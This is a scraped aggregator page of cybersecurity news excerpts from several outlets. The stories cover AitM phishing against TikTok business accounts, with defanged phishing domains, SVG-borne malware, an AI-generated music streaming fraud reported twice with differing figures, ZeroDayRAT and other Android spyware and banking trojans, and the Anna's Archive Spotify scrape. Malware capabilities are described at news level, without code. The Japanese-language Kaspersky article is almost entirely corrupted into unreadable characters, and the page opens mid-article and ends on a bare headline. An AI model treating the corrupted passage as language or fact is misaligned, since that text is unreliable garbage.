fronting a reverse proxy AiTM phishing kit. Why Threat Actors Target TikTok TikTok for Business accounts commonly are used by company marketing teams to manage advertising campaigns. Push Security said the development of targeting TikTok is “notable” given most phishing pages the threat researchers intercept ten to replicate SSO platforms like Google and Microsoft. “TikTok seems a weird choice at first glance. But it makes more sense when we consider that TikTok has been historically abused to distribute malicious links and social engineering instructions,” Push Security said in a blog published on March 26. The platform has been used to deliver infostealers via ClickFix-style instruction with AI-generated videos posed as activation guides for Windows, Spotify and CapCut. The social media platform is also a “common hunting ground” for crypto scammers. It was noted that since most users will opt to “log in with Google” anyone using Google to login to their TikTok account will effectively have both accounts used to distribute ads compromised in one go. This could start a Google Ad Manager exploitation chain where cybercriminals target ad manager accounts to power malvertising scams. Update, April 1, 2026: TikTok confirmed to Infosecurity that the domains mentioned in the report have been officially taken down and are no longer active. Image credit: JarTee / Shutterstock.com
infosecurity-magazine.comMar 27, 2026extracted
AitM Phishing Targets TikTok Business Accounts Using Cloudflare Turnstile Evasion
Threat actors are using adversary-in-the-middle (AitM) phishing pages to seize control of TikTok for Business accounts in a new campaign, according to a report from Push Security. Business accounts associated with social media platforms are a lucrative target, as they can be weaponized by bad actors for malvertising and distributing malware. "TikTok has been historically abused to distribute malicious links and social engineering instructions," Push Security said. "This includes multiple infostealers like Vidar, StealC, and Aura Stealer delivered via ClickFix-style instructions with AI-generated videos posed as activation guides for Windows, Spotify, and CapCut." The campaign begins with tricking victims into clicking on a malicious link that directs them to either a lookalike page impersonating TikTok for Business or a page that's designed to impersonate Google Careers, along with an option to schedule a call to discuss the opportunity. It's worth noting that a prior iteration of this credential phishing campaign was flagged by Sublime Security in October 2025, with emails masquerading as outreach messages used as a social engineering tactic. Regardless of the type of page served, the end goal is the same: perform a Cloudflare Turnstile check to block bots and automated scanners from analyzing the contents of the page and serve a malicious AitM phishing page login page that's designed to steal their credentials. The phishing pages are hosted on the following domains - welcome.careerscrews[.]com welcome.careerstaffer[.]com welcome.careersworkflow[.]com welcome.careerstransform[.]com welcome.careersupskill[.]com welcome.careerssuccess[.]com welcome.careersstaffgrid[.]com welcome.careersprogress[.]com welcome.careersgrower[.]com welcome.careersengage[.]com welcome.careerscrews[.]com The development comes as another phishing campaign has been observed using Scalable Vector Graphics (SVG) file attachments to deliver malware to targets located in Venezuela. According to a report published by WatchGuard, the messages have SVG files with file names in Spanish, masquerading as invoices, receipts, or budgets. "When these malicious SVGs are opened, they communicate with a URL that downloads the malicious artifact," the company said. "This campaign uses ja.cat to shorten URLs from legitimate domains that have a vulnerability that allows redirects to any URL, so they point to the original domain where the malware is downloaded." The downloaded artifact is a malware written in Go that shares overlaps with a BianLian ransomware sample detailed by SecurityScorecard in January 2024. "This campaign is a strong reminder that even seemingly harmless file types like SVGs can be used to deliver serious threats," WatchGuard said. "In this case, malicious SVG attachments were used to initiate a phishing chain that led to malware delivery associated with BianLian activity."
thehackernews.comMar 27, 2026extracted
Man pleads guilty to $8 million AI-generated music scheme
Man pleads guilty to $8 million AI-generated music scheme A North Carolina man pleaded guilty to orchestrating a years-long music streaming fraud scheme that used artificial intelligence and thousands of bot accounts to siphon more than $8 million in royalties. Michael Smith, 54, admitted to inflating streaming numbers for hundreds of thousands of AI-generated songs by deploying thousands of fake accounts across major platforms, including Amazon Music, Apple Music, Spotify and YouTube Music, according to court documents. U.S. prosecutors said Smith worked with a co-conspirator and the chief executive of an artificial intelligence music company to acquire a vast catalog of computer-generated tracks, which he then uploaded to streaming services. He used automated software to direct bot accounts to continuously play the songs, generating billions of streams between 2017 and 2024. To avoid detection, the activity was spread across thousands of tracks and routed through virtual private networks to mimic legitimate listeners. “Although the songs and listeners were fake, the millions of dollars Smith stole were real,” U.S. Attorney for the Southern District of New York Jay Clayton said in a statement. Smith created thousands of bot accounts — at times as many as 10,000 active at once — using fake email addresses purchased in bulk and outsourced labor to register the accounts. Through the scheme, Smith collected more than $8 million in royalty payments that would otherwise have gone to legitimate artists and songwriters, prosecutors said. He also made false statements to streaming services, rights organizations and music distributors in an effort to conceal the fraud, according to court filings. Smith could face up to five years in prison. Streaming platforms prohibit the artificial inflation of play counts through bots or other automated means. The streaming service Deezer said earlier this year it is receiving more than 60,000 fully AI-generated tracks daily, prompting the company to expand its AI detection tools and consider licensing the technology across the industry. Apple has also begun signaling a shift toward greater transparency, recently outlining plans to introduce metadata labels that disclose when and how AI is used in music production — a move aimed at helping platforms, distributors and listeners distinguish between human-created and synthetic content. Daryna Antoniuk is a reporter for Recorded Future News based in Ukraine. She writes about cybersecurity startups, cyberattacks in Eastern Europe and the state of the cyberwar between Ukraine and Russia. She previously was a tech reporter for Forbes Ukraine. Her work has also been published at Sifted, The Kyiv Independent and The Kyiv Post.
therecord.mediaMar 20, 2026extracted
Musician admits to $10M streaming royalty fraud using AI bots
North Carolina musician Michael Smith has pleaded guilty to collecting over $10 million in royalty payments through a massive streaming royalty fraud scheme on Spotify, Apple Music, Amazon Music, and YouTube Music. 54-year-old Smith bought hundreds of thousands of songs generated using artificial intelligence (AI) from an accomplice, uploaded them to these streaming platforms, and used automated AI bots to stream the AI-generated tracks billions of times. According to court documents unsealed when he was charged in September 2024, Smith fraudulently inflated listening stats on his songs on these digital platforms between 2017 and 2024 with the help of an unnamed music promoter and the Chief Executive Officer of an AI music company. To avoid detection by anti-fraud systems, Smith also had the bots access the streaming platforms using virtual private networks (VPNs). On October 4, 2018, he emailed his coconspirators to say, "to not raise any issues with the powers that be we need a TON of content with small amounts of Streams," and added that, "We need to get a TON of songs fast to make this work around the anti fraud policies these guys are all using now." At the peak of the operation, Smith was using over 1,000 bot accounts to artificially boost streams. On October 20, 2017, he also emailed himself a financial breakdown outlining how he operated 52 cloud service accounts, each with 20 bot accounts. He estimated that each bot could stream around 636 songs per day, for a total of approximately 661,440 streams per day. With an average royalty rate of half a cent per stream, the daily earnings would reach $3,307.20, the monthly earnings would reach $99,216, and the annual earnings would exceed $1.2 million, according to Smith. "Michael Smith generated thousands of fake songs using artificial intelligence and then streamed those fake songs billions of times. Although the songs and listeners were fake, the millions of dollars Smith stole was real," said U.S. Attorney Jay Clayton on Wednesday. "Millions of dollars in royalties that Smith diverted from real, deserving artists and rights holders. Smith's brazen scheme is over, as he stands convicted of a federal crime for his AI-assisted fraud." Prosecutors said that Smith fraudulently collected over $10 million in royalty payments after having his bots stream hundreds of thousands of AI-generated songs billions of times. In a February 2024 email, confirmed these claims bosting that the songs generated "over 4 billion streams and $12 million in royalties since 2019." Smith has agreed to pay $8,091,843.64 in forfeiture and faces a maximum sentence of 5 years in prison after pleading guilty to one count of conspiracy to commit wire fraud. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comMar 20, 2026extracted
政府サービス、偽ChatGPT、無料チケット……最新詐欺の侵入経路、カスペルスキーが報告
Kaspersky��2025�N�̃t�B�b�V���O����уX�p���������|�[�g�����J�����B���Ђ�5��5400�����ȏ�̃t�B�b�V���O�����N�ւ̃A�N�Z�X��j�~���A�S���E�̃��[���̖�45�����X�p���������ƕ��Ă���B ���̋L���͉������ł��B����o�^�i�����j����ƑS�Ă������������܂��B �@�Z�L�����e�B�x���_�[Kaspersky��2026�N2���A2025�N�̃t�B�b�V���O����уX�p���̓������܂Ƃ߂��N�����|�[�g�����J�����B���Ђ̃A����t�B�b�V���O�Z�p��5��5400�����ȏ�̈��ӂ��郊���N�ւ̃A�N�Z�X��j�~���A���[���p�A����}���E�F�A�͖�1��4500�����̈��ӂ���Y�t�t�@�C�������o�����Ƃ����B �@2025�N�͉��y�E�f��t�@������v�ȃ^�[�Q�b�g�Ƃ��鍼�\�����������B�U���҂͋U�̃A�O���Q�[�V�����T�C�g�iWeb��̏������̃e�[�}�ŏW�A���f�I�ɉ{���E�����ł���T�C�g�j��l�C�X�g���[�~���O�T�[�r�X�̂Ȃ肷�܂��T�C�g���쐬���Ă���B �@�U�A�O���Q�[�V�����T�C�g�ł́u�����v�̃R���T�[�g��P�b�g�Ől���W�߁A���z�́u�萔���v��u�z�����v�������ɁA���Ϗ��Ȃǂ�ގ�B�X�g���[�~���O�T�[�r�X�������\�ł́A���y�z�M�T�[�r�X�uSpotify�v�̃v���C���X�g���uYouTube�v�Ɉڍs���邽�߂�Spotify�̔F�؏�����͂�������A�D���ȃA�[�e�B�X�g�ւ̓��[�Ə̂��āuFacebook�v��uInstagram�v�A���[���̔F�؏�����͂������肷��B �@�u���W���ł́ASpotify�p�[�g�i�[�T�[�r�X���A�y�Ȃ��ĕ]�����邾���ŕ�V��������Ƃ��������\�����������B�o�^���Ƀu���W���̑������σV�X�e���uPix�v��ID������A�u�{�l�m�F�v�Ƃ���19.9�u���W�����A���i��4�h���j�̎x������v������B �@�܂��A�o��n�A�v���Œm�荇�������肪�U�̃�P�b�g�w�������N�𑗂�A�x������ɑ�����T�C�g��������Ƃ�����P�b�g���\�^���}���X���\���m�F���ꂽ�B �@���b�Z�[�W���O�T�[�r�X�uTelegram�v��uWhatsApp�v�̃A�J�E���g�ގ�́A2025�N�̎�v���Ђ̈�ƂȂ����B �@Telegram�ł́u����Premium�T�u�X�N���v�V�����v����ȉa�Ƃ��Ďg��ꂽ�B�����̃t�B�b�V���O�y�[�W�͈ȑO���V�A��Ɖp��݂̂Ŋm�F����Ă������A2025�N�ɂ͑�����ɂ��啝�Ɋg�債���B��Q�҂͏�����ꂽ�F�l�̃A�J�E���g����u�M�t�g�v����郁�b�Z�[�W�����A�A�N�e�B�x�[�g���邽�߂ɍU���҂̃T�C�g��Telegram�A�J�E���g�Ƀ��O�C������悤�U�������B �@�L���l�̃v���[���g���������\�����������B�uNFT�v�iNon-Fungible Token�A�����g�[�N���j�v���[���g�����U���́uTelegram Mini App�v��ʂ��Ď��s�B���ӂ̂���Mini App�̓A�v�����Ŋ������邽�߁A�O��URL�^�t�B�b�V���O��茩������̂�����B �@�����ł�WhatsApp�̃C���^�t�F�[�X��͕킵���t�B�b�V���O�y�[�W����������A�u��@�s�ׁv�𗝗R�Ɂu�lj��F�v���K�v�ƋU��A�d�b�ԍ��ƔF�R�[�h��ގ悷��B �@���{�|�[�^������I�ʒm��͕킵���t�B�b�V���O�͏]�����݂��邪�A2025�N�ɂ͐V���Ȏ�@���m�F���ꂽ�B �@���V�A�ł͐��{�T�[�r�X����̐g�Ɋo���̂Ȃ��s�����O�C����[�����F��������A�ڍׂȋU�Z�p�����L�ڂ������[���Ń��[�U�[�̕s����������r�b�V���O�i�������g�����t�B�b�V���O�j�U�������������B �@�u���W���ł́A�U�̐��{�|�[�^�����쐬���Ĕ[�ŎҔԍ��iCPF�ԍ��j�����W���鍼�\�����������BCPF�͍��ƃT�[�r�X�A���ƃf�[�^�x�[�X�A�l�����ւ̃A�N�Z�X�Ɏg���邽�߁A�ގ悳���Ɛg�����̂ɂȂ���B �@�m���E�F�[�ł͉^�]�Ƌ��̍X�V���Čl���⌈�Ϗ������W���鍼�\���A�p���ł͎ԗ��ł̖��������U�����Č����ގ��_�����[�����m�F���ꂽ�B �@2025�N�ɂ�KYC�i�{�l�m�F�j��F�b�N�����p����t�B�b�V���O�U�����}�������B�U���҂͎��݃T�[�r�X��KYC�y�[�W��͕킵�A�W���I�Ȍl���ɉ�����ID�摜���ʐ^�ȂǍ����l�̌l�f�[�^�����W����B �@���W���ꂽ���̓_�[�NWeb�Ŕ̔�����邩�A�g�����̂Ɏg�p�����\��������Ƃ����B �@AI�i�l�H�m�\�j�T�[�r�X�l�C�̍��܂�ɔ����A�uChatGPT�v�֘A���\�����������B�U���҂͋U�́uChatGPT Plus�v�T�u�X�N���v�V�������σy�[�W���\�z������ASNS�i�\�[�V�����l�b�g���[�L���O�T�[�r�X�j�Ńo�Y�邱�Ƃ�ۏ���u���j�[�N�ȃv�����v�g�v�̔��Ȃǂ̎�������s�����肷��B �@ChatGPT������Ƀx�b�e�B���O���s���A���[�U�[�͌��Ă��邾���Ŏ�����������Ƃ��������\���m�F���ꂽ�B���̃I�t�@�[�́u�y�[�W���J���Ă���15���Ԃ̂ݗL���v�Ƃ���A��Q�҂ɍl���鎞�Ԃ�^���Ȃ��B �@�U���҂�AI��ϋɓI�Ɋ��p���Ă���A�f�B�[�v�t�F�C�N�A���i���ȋUWeb�T�C�g�f�U�C���̎������A�U���[���{���̐����Ȃǂɗ��p���āA�M���������߂Ă���B��Q�҂Ƃ̃��C�u�ʘb�����\�H���ɑg�ݍ����i�K�U�����������Ă���Ƃ����B �@�������̃����[�g���l���A����҂̌l����u�萔���v�����悷����������Ă���B �@���I���Ȏ���Ƃ��āA�u�l�ޏЉ��Ёv�����t�B�b�V���O�T�C�g���o�^����Telegram�A�J�E���g�ɂЂ��t�����d�b�ԍ���v������P�[�X���������B�o�^���������邽�߁u�m�F�R�[�h�v�̓��͂����߂�ꂽ���A����͎��ۂɂ�Telegram�̔F�R�[�h�������B�R�[�h���͌���T�C�g�̓v���t�B�[���ڍׂ����ߑ����A��Q�҂��V�������O�C���ʒm�ɋC�t���Ȃ��悤���ӂ����炷�B�u�m�F�̂���24���ԑ҂v�悤�w�����邱�ƂŁA�U���҂�Telegram�A�J�E���g�����S�ɏ����鎞�Ԃ��m�ۂ���B �@2025�N���U���҂��g�����h��j���[�X�����p�������͕p�������B�C���^�[�l�b�g��̃W���[�N��摜�i�~�[���j�����`�[�t�ɍ��ꂽ�Í����Y�i���z�ʉ݁j�́u�~�[���R�C���v�A�X�}�[�g�t�H���V���i�A�����l�C�x���g�A�l�C�A�[�e�B�X�g�Ȃǂ��ނɂ������\���[����L���X�p�����m�F����Ă���B �@Kaspersky�͈ȉ��̑�𐄏����Ă���B Copyright © ITmedia, Inc. All Rights Reserved.
atmarkit.itmedia.co.jpMar 18, 2026extracted
171: Melody Fraud
What if the music charts you see aren’t real? What if the numbers that define success can be manufactured? We talked to Andrew, a man who has spent his career on both sides of this battle. He once profited from the loopholes in streaming platforms, but now, his job is to close them. This episode will change the way you understand music streaming platforms from now on. Sponsors Support for this show comes from ThreatLocker®. ThreatLocker® is a Zero Trust Endpoint Protection Platform that strengthens your infrastructure from the ground up. With ThreatLocker® Allowlisting and Ringfencing™, you gain a more secure approach to blocking exploits of known and unknown vulnerabilities. ThreatLocker® provides Zero Trust control at the kernel level that enables you to allow everything you need and block everything else, including ransomware! Learn more at www.threatlocker.com. Support for this show comes from Adaptive Security. Deepfake voices on a Zoom call. AI-written phishing emails that sound exactly like your CFO. Synthetic job applicants walking through the front door. Adaptive is built to stop these attacks. They run real-time simulations, exposing your teams to what these attacks look like to test and improve your defences. Learn more at adaptivesecurity.com. This episode is sponsored by Meter, the company building networks from the ground up. Meter delivers a complete networking stack - wired, wireless, and cellular - in one solution that’s built for performance and scale. Alongside their partners, Meter designs the hardware, writes the firmware, builds the software, manages deployments, and runs support. Learn more at meter.com. Attribution Darknet Diaries is created by Jack Rhysider. Assembled by Tristan Ledger. Episode artwork by odibagas. Mixing by Proximity Sound. Theme song created by Breakmaster Cylinder. Theme song available for listen and download at bandcamp. Or listen to it on Spotify. Transcript [Start of recording] JACK: I’ve always like the idea of fake it ‘til you make it, where you act like someone you want to be until you become them. This sometimes comes with imposter syndrome, but I think the antidote to that is just more experience. But how do you go from being a total beginner to confidently doing something? I often turn to the book store to help me there. But you know a book that’s always bothered me? It’s those For Dummies books, like the C Programming For Dummies, or The Complete Idiot’s Guide. Even if I don’t have a clue where to start, I would never buy one of those books because I don’t consider myself a dummy or an idiot, because I want to fake it ‘til I make it, and I don’t want to fake being a dummy. I want to be a great programmer. So, A Dummy’s Guide to Programming is not the direction I want to be going. I think what those books fail to do is they seem to target who you are now, not what you want to become, and that was their failure, at least for me.
darknetdiaries.comMar 3, 2026extracted
New ZeroDayRAT Mobile Spyware Enables Real-Time Surveillance and Data Theft
Cybersecurity researchers have disclosed details of a new mobile spyware platform dubbed ZeroDayRAT that's being advertised on Telegram as a way to grab sensitive data and facilitate real-time surveillance on Android and iOS devices. "The developer runs dedicated channels for sales, customer support, and regular updates, giving buyers a single point of access to a fully operational spyware panel," Daniel Kelley, security researcher at iVerify, said. "The platform goes beyond typical data collection into real-time surveillance and direct financial theft." ZeroDayRAT is designed to support Android versions 5 through 16 and iOS versions up to 26. It's assessed that the malware is distributed via social engineering or fake app marketplaces. The malicious binaries are generated through a builder that's provided to buyers along with an online panel that they can set up on their own server. Once the malware infects a device, the operator gets to see all the details, including model, location, operating system, battery status, SIM, carrier details, app usage, notifications, and a preview of recent SMS messages, through a self-hosted panel. This information allows the threat actor to profile the victim and glean more about who they talk to and the apps they use the most. The panel also extracts their current GPS coordinates and plots them on Google Maps, along with the history of all locations they have been to over time, effectively turning it into spyware. "One of the more problematic panels is the accounts tab," Kelley added. "Every account registered on the device is enumerated: Google, WhatsApp, Instagram, Facebook, Telegram, Amazon, Flipkart, PhonePe, Paytm, Spotify, and more, each with its associated username or email." Some of the other capabilities of ZeroDayRAT include logging keystrokes, gathering SMS messages -- including one-time passwords (OTPs) to defeat two-factor authentication, as well as allowing hands-on operations, such as activating real-time surveillance via live camera streaming and a microphone feed that allows the adversary to remotely monitor a victim. To enable financial theft, the malware incorporates a stealer component that scans for wallet apps like MetaMask, Trust Wallet, Binance, and Coinbase, and substitutes wallet addresses copied to the clipboard to reroute transactions to a wallet under the attacker's control. There also exists a bank stealer module to target online mobile wallet platforms like Apple Pay, Google Pay, PayPal, along with PhonePe, an Indian digital payments application that allows instant money transfers with the Unified Payments Interface (UPI), a protocol to facilitate inter-bank peer-to-peer and person-to-merchant transactions. "Taken together, this is a complete mobile compromise toolkit, the kind that used to require nation-state investment or bespoke exploit development, now sold on Telegram," Kelley said. "A single buyer gets full access to a target's location, messages, finances, camera, microphone, and keystrokes from a browser tab. Cross-platform support and active development make it a growing threat to both individuals and organizations." The ZeroDayRAT malware is similar to numerous others that have targeted mobile device users, either via phishing or by infiltrating official app marketplaces. Over the past few years, bad actors have repeatedly managed to find various ways to bypass security protections put in place by Apple and Google to trick users into installing malicious apps. Attacks targeting Apple's iOS have typically leveraged an enterprise provisioning capability that allows organizations to install apps without the need for publishing them to the App Store. By marketing tools that combine spyware, surveillance, and information-stealing capabilities, they further lower the barrier of entry for less skilled hackers. They also highlight the evolving sophistication and persistence of mobile-focused cyber threats. News of the commercial spyware platform coincides with the emergence of various mobile malware and scam campaigns that have come to light in recent weeks - An Android remote access trojan (RAT) campaign has used Hugging Face to host and distribute malicious APK files. The infection chain begins when users download a seemingly harmless dropper app (e.g., TrustBastion) that, when opened, prompts users to install an update, which causes the app to download the APK file hosted on Hugging Face. The malware then requests accessibility permissions and access to other sensitive controls to enable surveillance and credential theft. An Android RAT called Arsink has been found to use Google Apps Script for media and file exfiltration to Google Drive, in addition to relying on Firebase and Telegram for C2. The malware, which allows data theft and complete remote control, is distributed via Telegram, Discord, and MediaFire links, while impersonating various popular brands. Arsink infections have been concentrated in Egypt, Indonesia, Iraq, Yemen, and Türkiye. A document reader app named All Document Reader (package name: com.recursivestd.highlogic.stellargrid) uploaded to the Google Play Store has been flagged for acting as an installer for the Anatsa (aka TeaBot and Toddler) banking trojan. The app attracted over 50,000 downloads before it was taken down. An Android banking trojan called deVixor has been actively targeting Iranian users through phishing websites that impersonate legitimate automotive businesses since October 2025. Besides harvesting sensitive information, the malware includes a remotely triggered ransomware module capable of locking devices and demanding cryptocurrency payments. It uses Google Firebase for command delivery and Telegram-based bot infrastructure for administration. A malicious campaign codenamed ShadowRemit has exploited fake Android apps and pages mimicking Google Play app listings to enable unlicensed cross-border money transfers. These bogus pages have been found to promote unauthorized APKs as trusted remittance services with zero fees and improved exchange rates. "Victims are instructed to send payments to beneficiary accounts/eWallet endpoints and provide transaction screenshots as proof for verification," CTM360 said. "This approach can bypass regulated remittance corridors and aligns with mule-account collection patterns." An Android malware campaign targeting users in India has abused the trust associated with government services and official digital platforms to distribute malicious APK files through WhatsApp, leading to the deployment of malware that can steal data, establish persistent control, and run a cryptocurrency miner. The operators of an Android trojan and cybercrime tool called Triada have been observed using phishing landing pages disguised as Chrome browser updates to trick users into downloading malicious APK files hosted on GitHub. According to an analysis by Alex, attackers are "actively taking over long-standing, fully verified advertiser accounts to distribute malicious redirects." A WhatApp-oriented scam campaign has leveraged video calls, in which the threat actor poses as a bank representative or a Meta support and instructs them to share their phone's screen to address a purported unauthorized charge on their credit card, and install a legitimate remote access app, such as AnyDesk or TeamViewer, to steal sensitive data. An Android spyware campaign has leveraged romance scam tactics to target individuals in Pakistan to distribute a malicious dating chat app dubbed GhostChat to exfiltrate victims' data. It's currently not known how the malware is distributed. The threat actors behind the operation are also suspected to be running a ClickFix attack that infects victims' computers with a DLL payload that can gather system metadata and run commands issued by an external server, as well as a WhatsApp device-linking attack called GhostPairing to gain access to their WhatsApp accounts. A new family of Android click fraud trojans called Phantom has been found to leverage TensorFlow.js, a JavaScript machine learning library, to automatically detect and interact with specific advertisement elements on a site loaded in a hidden WebView. An alternative "signaling" mode uses WebRTC to stream a live video feed of the virtual browser screen to the attackers' server and allow them to click, scroll, or enter text. The malware is distributed via mobile games published to Xiaomi's GetApps store and other unofficial, third-party app stores. An Android malware family called NFCShare has been distributed via a Deutsche Bank phishing campaign to deceive users into installing a malicious APK file ("deutsche.apk") under the pretext of an update, which reads NFC card data and exfiltrates it to a remote WebSocket endpoint. The malware shares similarities with NFC relay malware families like NGate, ZNFC, SuperCard X, PhantomCard, and RelayNFC, with its command-and-control (C2) server previously flagged as associated with SuperCard X activity in November 2025. In a report published last month, Group-IB said it has witnessed a surge in NFC-enabled Android tap-to-pay malware, most of which is advertised within Chinese cybercrime communities on Telegram. The NFC-based relay technique is also referred to as Ghost Tap. "At least $355,000 in illegitimate transactions have been recorded from one POS vendor alone throughout November 2024 – August 2025," the Singapore-headquartered cybersecurity company said. "In another observed scenario, mobile wallets preloaded with compromised cards are used by mules across the globe to make purchases." Group-IB also said it identified three major vendors of Android NFC relay apps, including TX-NFC, X-NFC, and NFU Pay, with TX-NFC amassing over 25,000 subscribers on Telegram since commencing operations in early January 2025. X-NFC and NFU Pay have more than 5,000 and 600 subscribers on the messaging platform, respectively. The end goal of these attacks is to trick victims into installing NFC-enabled malware and tapping their physical payment cards on their smartphone, causing the transaction data to be captured and relayed to the cybercriminal's device through an attacker-controlled server. Once the card details are exfiltrated, a dedicated app installed on the money mule's device is used to complete payments or cash-out as though the victims' cards were physically present. Calling tap-to-pay scams a growing concern, Group-IB said it observed a steady increase in the detection of malware artifacts between May 2024 and December 2025. "At the same time, different families and variants are also appearing, while the old ones remain active," it added. "This indicates the spread of this technology among fraudsters."
thehackernews.comFeb 16, 2026extracted
Hacktivists claim near-total Spotify music scrape
Hacktivist group Anna’s Archive claims to have scraped almost all of Spotify’s catalog and is now seeding it via BitTorrent, effectively turning a streaming platform into a roughly 300 TB pirate “preservation archive.” On its blog, the group states: “A while ago, we discovered a way to scrape Spotify at scale. We saw a role for us here to build a music archive primarily aimed at preservation.” Spotify insists that the hacktivists obtained no user data. Still, the incident highlights how large‑scale scraping, digital rights management (DRM) circumvention, and weak abuse controls can turn major content platforms into high‑value targets. Anna’s Archive claims it obtained metadata for around 256 million tracks and audio files for roughly 86 million songs, totaling close to 300 TB. Reportedly, this represents about 99.9% of Spotify’s catalog and roughly 99.6% of all streams. Spotify says it has “identified and disabled the nefarious user accounts that engaged in unlawful scraping” and implemented new safeguards. From a security perspective, this incident is a textbook example of how scraping can escalate beyond “just metadata” into industrial‑scale content theft. By combining public APIs, token abuse, rate‑limit evasion, and DRM bypass techniques, attackers can extract protected content at scale. If you can create or compromise enough accounts and make them appear legitimate, you can chip away at content protections over time. The “Spotify scrape” will likely be framed as a copyright story. But from a security angle, it serves as a reminder: if a platform exposes content or metadata at scale, someone will eventually automate access to it, weaponize it, and redistribute it. And hiding behind violations of terms and conditions—which have never stopped criminals—is not effective security control. How does this affect you? There is currently no indication that passwords, payment details, or private playlists were exposed. This incident is purely about content and metadata, not user databases. That said, scammers may still claim otherwise. Be cautious of messages alleging your account data was compromised and asking for your login details. Some general Spotify security tips, to be on the safe side: If you have reused your Spotify password elsewhere or shared your credentials, consider changing your password for peace of mind. Regularly review active sessions on streaming services and revoke anything you do not recognize. Spotify does not offer per-device session management, but you can sign out of all devices via Account > Settings and privacy on the Spotify website. Avoid unofficial downloaders, converters, or “Spotify mods” that ask for your login or broad OAuth permissions. These tools often rely on the same kind of scraping infrastructure—or worse, function as credential-stealing malware. Scammers don’t need to hack you. They just need you to click once. Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.
malwarebytes.comDec 23, 2025extracted
86 milioni di brani Spotify senza abbonamento: la minaccia degli attivisti di Anna’s Archive
Betti RHC, la prima graphic novel al mondo dedicata alla cybersecurity awareness, ha finalmente il suo sito ufficiale. Uno spazio tutto suo dove scoprire il progetto, sfogliare le copertine degli episodi e immergersi nel mondo di Betti: la giovane laureanda in informatica che, dopo la morte misteriosa del padre, si trasforma nell'hacker più potente del mondo. Una storia avvincente che, episodio dopo episodio, affronta una minaccia digitale diversa — dal phishing al ransomware, fino al cyberbullismo — e insegna a riconoscerla e a difendersi, senza che sembri mai una lezione. Sul sito trovate tutto ciò che rende Betti un progetto diverso dal solito: la sua filosofia, le anteprime delle tavole e il racconto di come nasce ogni volume. Perché dietro Betti RHC c'è solo lavoro umano: ogni tavola è disegnata interamente a mano dagli artisti del Gruppo Arte di Red Hot Cyber, senza alcun uso di intelligenza artificiale. E a garantire che ogni storia sia realistica e tecnicamente corretta c'è la supervisione degli hacker etici del gruppo HackerHood, che mantengono il racconto fedele al mondo reale della sicurezza informatica. C'è spazio anche per le aziende, che possono usare Betti come strumento di awareness diverso dai soliti corsi: acquistare i volumi, personalizzarli con il proprio brand o sponsorizzare nuovi episodi. E come primo regalo, l'episodio "Byte the Silence", dedicato al cyberbullismo, è scaricabile gratuitamente per uso personale. Perché la miglior difesa, in fondo, è una bella storia. 👉 Scopri tutto su https://betti.redhotcyber.com/
redhotcyber.comDec 23, 2025extracted
Spotify disables accounts after open-source group scrapes 86 million songs from platform
Spotify disables accounts after open-source group scrapes 86 million songs from platform Spotify responded on Monday to an open-source group’s decision to publish files over the weekend containing 86 million tracks scraped from the music streaming platform. Anna's Archive, which calls itself the “largest truly open library in human history,” said on Saturday that it discovered a way to scrape Spotify’s files and subsequently released a database of metadata and songs. A spokesperson for Spotify told Recorded Future News that it “has identified and disabled the nefarious user accounts that engaged in unlawful scraping.” “We’ve implemented new safeguards for these types of anti-copyright attacks and are actively monitoring for suspicious behavior,” the spokesperson said. “Since day one, we have stood with the artist community against piracy, and we are actively working with our industry partners to protect creators and defend their rights." The spokesperson added that Anna’s Archive did not contact them before publishing the files. They also said it did not consider the incident a “hack” of Spotify. The people behind the leaked database systematically violated Spotify’s terms by stream-ripping some of the music from the platform over a period of months, a spokesperson said. They did this through user accounts set up by a third party and not by accessing Spotify’s business systems, they added. Anna’s Archive published a blog post about the cache this weekend, writing that while it typically focuses its efforts on text, its mission to preserve humanity’s knowledge and culture “doesn’t distinguish among media types.” “Sometimes an opportunity comes along outside of text. This is such a case. A while ago, we discovered a way to scrape Spotify at scale. We saw a role for us here to build a music archive primarily aimed at preservation,” they said. “This Spotify scrape is our humble attempt to start such a ‘preservation archive’ for music. Of course Spotify doesn’t have all the music in the world, but it’s a great start.” While the full release contains a music metadata database with 256 million tracks, Anna’s Archive put together a bulk file a little under 300 terabytes in size featuring 86 million music files that account for about 99.6% of all listens on Spotify. There is another smaller file featuring the top 10,000 most popular songs. The files cover all music posted on Spotify from 2007 to July 2025. Anna’s Archive called it “by far the largest music metadata database that is publicly available.” “With your help, humanity’s musical heritage will be forever protected from destruction by natural disasters, wars, budget cuts, and other catastrophes,” the organization said. The blog post outlines distinct trends from Spotify data. The top three songs on Spotify — Billie Eilish's “Birds of a Feather,” Lady Gaga's “Die with a Smile” and Bad Bunny's “DtMF” — have a higher total stream count than the bottom 20-100 million songs combined. Anna’s Archive, which is banned in several countries for its repeated copyright violations, was created in the wake of the law enforcement shutdown of Z-Library in 2022. The Justice Department arrested and charged two Russian nationals in 2022 for running Z-Library, which at the time was “the world’s largest library” and claimed to have at least 11 million e-books for download. Anna's Archive emerged days after Z-Library was shut down and aggregated records from that site as well as several other free online libraries like the Internet Archive, Library Genesis and Sci-Hub. As of December, Anna's Archive has more than 61 million books and 95 million papers. Copyright holders in multiple countries have tried to sue the organization, and Google in November said it removed nearly 800 million links to Anna's Archive from its search engine after publishers issued takedown requests. Jonathan Greig is a Breaking News Reporter at Recorded Future News. Jonathan has worked across the globe as a journalist since 2014. Before moving back to New York City, he worked for news outlets in South Africa, Jordan and Cambodia. He previously covered cybersecurity at ZDNet and TechRepublic.
therecord.mediaDec 22, 2025extracted
Hacktivists scrape 86M Spotify tracks, claim their aim is to preserve culture
